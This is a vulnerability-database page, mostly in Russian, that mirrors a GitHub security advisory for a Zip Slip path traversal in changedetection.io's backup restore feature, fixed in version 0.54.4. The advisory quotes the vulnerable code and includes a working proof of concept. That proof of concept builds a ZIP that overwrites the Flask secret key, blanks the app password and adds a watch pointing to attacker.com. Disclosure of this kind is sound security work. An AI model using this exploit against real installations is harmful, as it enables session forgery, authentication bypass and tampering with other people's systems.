Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-25g8-2mcf-fcx9

Опубликовано: 04 мар. 2026
Источник: github
Github: Прошло ревью
CVSS4: 8.8

Описание

changedetection.io has Zip Slip vulnerability in the backup restore functionality

Summary

A Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives.

Details

A Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives. The application uses zipfile.extractall() without validating entry paths, allowing ../ sequences to escape the extraction directory.

Vulnerable Code (lines 50-53):

def restore_backup(self, filename): with zipfile.ZipFile(filename, 'r') as zip_ref: # VULNERABLE: No path validation before extraction zip_ref.extractall(self.datastore_path)

The extractall() function preserves the relative paths stored within the ZIP archive. When a malicious ZIP contains entries with ../ path traversal sequences, these files are extracted outside the intended directory.

Path in ZIPTarget FileImpact
../secret.txtFlask secret keySession forgery, auth bypass
../changedetection.jsonApp settingsDisable password, inject backdoor
../url-watches.jsonWatch indexInject malicious watches
../{uuid}/watch.jsonWatch configModify any watch

Attacker uploads ZIP via the backup restore functionality at /backups/restore Application extracts files without validation, writing attacker content to sensitive locations

PoC

Step 1: Create Malicious ZIP

import zipfile import json with zipfile.ZipFile("zipslip.zip", "w") as zf: # Escape extraction directory with ../ zf.writestr("../secret.txt", "ATTACKER-CONTROLLED-SECRET") zf.writestr("../changedetection.json", json.dumps({ "settings": {"application": {"password": ""}} })) zf.writestr("../pwned-uuid-1234/watch.json", json.dumps({ "url": "https://attacker.com/zipslip-pwned", "title": "🔴 ZIPSLIP-PROOF" }))

Step 2: Upload via Restore Endpoint

-F "zip_file=@zipslip.zip" \ -F "include_watches=y" \ -F "include_settings=y"

###Step 3: Verify Path Traversal

Check if watch escaped to /datastore/

###ls -la /datastore/

Look for: pwned-uuid-1234/

Verify in UI

curl "http://target:5000/" | grep "ZIPSLIP"

f_cBHEuvFcXsOiI-pcj1wJ9yzKCRM

Пакеты

Наименование

changedetection.io

pip
Затронутые версииВерсия исправления

<= 0.54.3

0.54.4

EPSS

Процентиль: 21%
0.00069
Низкий

8.8 High

CVSS4

Дефекты

CWE-22

Связанные уязвимости

CVSS3: 9.1
nvd
24 дня назад

changedetection.io is a free open source web page change detection tool. Prior to version 0.54.4, a Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives. This issue has been patched in version 0.54.4.

EPSS

Процентиль: 21%
0.00069
Низкий

8.8 High

CVSS4

Дефекты

CWE-22